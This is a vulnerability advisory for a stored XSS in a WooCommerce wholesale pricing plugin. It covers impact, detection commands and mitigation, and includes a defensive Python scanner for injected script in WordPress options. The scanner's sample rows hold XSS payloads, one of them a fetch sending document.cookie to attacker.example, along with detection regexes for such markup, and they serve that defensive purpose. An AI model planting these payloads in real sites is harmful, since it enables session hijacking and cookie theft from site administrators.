CVE-2026-4479
Stored XSS in WooCommerce WholeSale Pricing Plugin Admin Settings
Publication date: 2026-04-14
Last updated on: 2026-04-14
Assigner: Wordfence
Description
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| woocommerce | whole_sale_products_dynamic_pricing_management | up to and including 1.2 |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
AI Powered Q&A
Can you explain this vulnerability to me?
The WholeSale Products Dynamic Pricing Management plugin for WooCommerce is vulnerable to Stored Cross-Site Scripting (XSS) in all versions up to and including 1.2. Values entered in the plugin's admin settings are saved without adequate input sanitization and rendered without output escaping, so HTML or script placed in a settings field is stored and later emitted verbatim.
An authenticated attacker with administrator-level access or higher can therefore save arbitrary web script into the settings; that script runs in the browser of any user who later loads the affected page.
The issue counts as a vulnerability only on multi-site installations and on single-site installations where the unfiltered_html capability has been removed (for example via the DISALLOW_UNFILTERED_HTML constant). In a default single-site install, administrators already hold unfiltered_html and are permitted to post raw HTML and script, so there is nothing for the plugin to prevent. On multi-site, only super administrators have that capability, so a site administrator who can inject script through these settings is exceeding what WordPress intends.
How can this vulnerability impact me?
The vulnerability lets an attacker who holds (or has compromised) an administrator account store script that executes in the browser of anyone who opens the affected admin settings page, typically another administrator or, on multi-site, a super administrator.
Script running in a privileged WordPress session can steal cookies and nonces, hijack that session, and perform authenticated actions on the victim's behalf, such as changing settings or creating accounts.
Because exploitation needs administrator privileges and only matters where administrators are not already allowed to post raw HTML, the realistic scenario is a rogue or compromised site administrator on a multi-site network escalating against super administrators, or a deliberately hardened single site where unfiltered_html has been disabled. Default single-site installations are not affected.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This is a Stored XSS in the admin settings of the WholeSale Products Dynamic Pricing Management plugin, so the payload lives in the database (plugin settings are normally kept in the options table) and is rendered when an administrator opens the settings page. Detection means two things: confirming whether a vulnerable version is installed, and checking the stored settings for injected markup. Note that only multi-site installations and sites with unfiltered_html disabled are in scope.
Because the payload is stored data, the checks below inspect the database and the rendered admin pages rather than network traffic.
- Confirm the installed version with WP-CLI: wp plugin list --fields=name,version,status. Any version up to and including 1.2 is affected.
- Locate the plugin's options. This page does not list the option keys, so find them by name, for example wp option list --search='*wholesale*' (adjust the wildcard to the plugin's slug), or look for update_option and register_setting calls in the plugin source.
- Search stored values for injection indicators. The options table uses the site's prefix, which is not always wp_ (wp db prefix prints it), and matching only the literal <script> misses event-handler attributes, javascript: URIs and mixed-case tags. For example: wp db query "SELECT option_id, option_name FROM $(wp db prefix)options WHERE option_value REGEXP '<script|javascript:|on[a-z]+='"
- Manually review the plugin's settings page for unexpected content, and compare the rendered HTML (browser developer tools, or curl with an authenticated session cookie) against the expected field values, since injected markup may not be visible in the form itself.
- Review which accounts hold administrator (and, on multi-site, super administrator) rights, and check any activity or audit log for unexpected changes to the plugin's settings.
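The following script is an added example, not code from this page or from the plugin. It performs the database-side check described above offline: it scans rows shaped like wp_options for the usual stored-XSS indicators (script tags, event-handler attributes, javascript: URIs, active elements) rather than only the literal <script>, and builds the equivalent server-side query for wp db query with the site's real table prefix. The option names, the sample rows, and the php_s helper that mimics PHP's serialize() string format are constructed for the example; the advisory does not document the plugin's actual option keys.

```python
import re
from typing import Iterable, List, NamedTuple, Optional, Sequence, Tuple

# Indicators of stored script in option values. Matching on "<script>" alone misses
# event handlers, javascript: URIs and mixed-case tags, so each class gets its own pattern.
XSS_INDICATORS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "event_handler": re.compile(r"\bon[a-z]{3,}\s*=", re.I),
    "javascript_uri": re.compile(r"javascript\s*:", re.I),
    "active_element": re.compile(r"<\s*(iframe|object|embed|svg|math)\b", re.I),
    "html_data_uri": re.compile(r"data\s*:\s*text/html", re.I),
}


class Finding(NamedTuple):
    option_id: int
    option_name: str
    indicator: str
    excerpt: str


Row = Tuple[int, str, str]  # (option_id, option_name, option_value), as in wp_options


def php_s(value: str) -> str:
    """Encode one string the way PHP's serialize() does: byte length, then the bytes."""
    return f's:{len(value.encode("utf-8"))}:"{value}";'


# Constructed sample rows shaped like wp_options. The "wsp_" option names are hypothetical.
SAMPLE_ROWS: List[Row] = [
    (1, "blogname", "Example Shop"),
    (2, "wsp_pricing_settings",  # serialized array, payload inside one of its strings
     "a:2:{" + php_s("label") + php_s("Wholesale tier")
     + php_s("note") + php_s("<img src=x onerror=alert(document.cookie)>") + "}"),
    (3, "wsp_pricing_message", "Buy 10, get 5% off"),
    (4, "wsp_banner_html",
     "Save now! <ScRiPt>fetch('https://attacker.example/?c='+document.cookie)</ScRiPt>"),
    (5, "wsp_terms_link", '<a href="javascript:alert(1)">terms</a>'),
    (6, "wsp_footer_note", "Prices in &lt;b&gt;USD&lt;/b&gt;"),  # entity-encoded, inert
]


def scan_options(rows: Iterable[Row],
                 name_prefixes: Optional[Sequence[str]] = None) -> List[Finding]:
    """Return one Finding per (row, indicator) hit, optionally limited to option-name prefixes.

    Serialized option values are scanned as raw text, which is sufficient here because an
    injected payload is always a substring of the serialized blob.
    """
    findings: List[Finding] = []
    for option_id, name, value in rows:
        if name_prefixes and not name.startswith(tuple(name_prefixes)):
            continue
        for label, rx in XSS_INDICATORS.items():
            m = rx.search(value)
            if m is None:
                continue
            start = max(0, m.start() - 15)
            findings.append(Finding(option_id, name, label, value[start:m.end() + 40]))
    return findings


def wp_cli_query(prefix: str = "wp_", name_like: str = "%") -> str:
    """Build the equivalent SQL for `wp db query`.

    `prefix` must be the site's real table prefix (`wp db prefix` prints it). MySQL REGEXP
    is case-insensitive on non-binary columns, so mixed-case tags are still caught.
    """
    pattern = "<script|javascript:|on[a-z]{3,}=|<(iframe|object|embed|svg)"
    return (f"SELECT option_id, option_name FROM {prefix}options "
            f"WHERE option_name LIKE '{name_like}' AND option_value REGEXP '{pattern}'")


if __name__ == "__main__":
    for f in scan_options(SAMPLE_ROWS, name_prefixes=["wsp_"]):
        print(f"option {f.option_id} ({f.option_name}): {f.indicator}: {f.excerpt!r}")
    print(wp_cli_query(prefix="wp_", name_like="wsp_%"))
```

Rows 2, 4 and 5 are flagged (event handler inside a serialized array, mixed-case script tag, javascript: URI) while the entity-encoded row 6 is not, which is the distinction a plain LIKE '%<script>%' cannot make. Treat hits as triage leads: the event-handler pattern in particular will also match harmless strings such as "online=" in a stored URL.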
What immediate steps should I take to mitigate this vulnerability?
To mitigate this vulnerability, immediate steps include:
- Update the WholeSale Products Dynamic Pricing Management plugin to a patched release as soon as the vendor publishes one; every version up to and including 1.2 is affected, so check the plugin changelog or the Wordfence advisory for the fixed version before relying on an update.
- Restrict administrator-level access to trusted users only and enforce strong authentication (including multi-factor authentication) on those accounts, since exploitation requires an administrator session.
- If no fixed version is available, deactivate the plugin. Do not re-enable unfiltered_html as a workaround: that does not remove the injection vector, it only grants every administrator the right to post raw script and removes the protection that the finding is defined against.
- Audit the plugin's stored settings for injected markup and remove it. If a payload is found, treat it as evidence of a rogue or compromised administrator account: identify which account saved it, revoke its sessions, and rotate its credentials.